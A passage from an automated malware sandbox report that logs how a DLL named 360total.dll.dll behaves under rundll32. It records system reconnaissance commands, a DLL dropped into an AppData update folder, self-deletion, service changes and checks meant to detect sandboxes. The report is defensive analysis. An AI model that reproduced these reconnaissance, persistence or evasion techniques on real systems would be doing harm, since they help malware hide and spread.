                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net.exeSection loaded: browcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: cscapi.dll
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: Slides.lnk.12.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Docs.lnk.12.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Google Drive.lnk.12.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: YouTube.lnk.12.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Sheets.lnk.12.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: Gmail.lnk.12.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: C:\Windows\System32\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: 360total.dll.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: 360total.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 360total.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 360total.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 360total.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 360total.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 360total.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 360total.dll.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000004.00000003.2007308735.00000237C3230000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2008448685.0000000180086000.00000002.00000001.01000000.00000000.sdmp, 360total.dll.dll, Update_27361bf8.dll.4.dr
                      Source: 360total.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 360total.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 360total.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 360total.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 360total.dll.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,3_2_00000001800033E0
                      Source: Update_27361bf8.dll.4.drStatic PE information: real checksum: 0xd8785 should be: 0xe745c
                      Source: 360total.dll.dllStatic PE information: real checksum: 0xd8785 should be: 0xe745c
                      Source: 360total.dll.dllStatic PE information: section name: wsgi2
                      Source: Update_27361bf8.dll.4.drStatic PE information: section name: wsgi2
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180010451 push rcx; ret 3_2_0000000180010452
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001045A push rcx; ret 3_2_000000018001045B
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001801758FC push rsp; ret 3_2_00000001801758FD
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180175CDE push 2027C70Fh; ret 3_2_0000000180175CE5

                      Persistence and Installation Behavior

                      barindex
                      Uses ipconfig to lookup or modify the Windows network settings
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dllJump to dropped file

                      Boot Survival

                      barindex
                      Uses net.exe to modify the status of services
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net config workstation
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,3_2_0000000180049AEC

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Deletes itself after installation
                      Source: C:\Windows\System32\rundll32.exeFile deleted: c:\users\user\desktop\360total.dll.dllJump to behavior
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,3_2_0000000180062148
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Contains functionality to compare user and computer (likely to detect sandboxes)
                      Source: C:\Windows\System32\rundll32.exeCode function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection,3_2_00000001800655A8
                      Contains functionality to detect sleep reduction / modifications
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180049AEC3_2_0000000180049AEC
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_3_000001E3B57E76DC rdtsc 8_3_000001E3B57E76DC
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,4_2_00000237C16C68E8
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,4_2_00000237C16C7FA8
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 545Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 668Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 8786Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dllJump to dropped file
                      Source: C:\Windows\System32\rundll32.exeAPI coverage: 0.1 %
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180049AEC3_2_0000000180049AEC
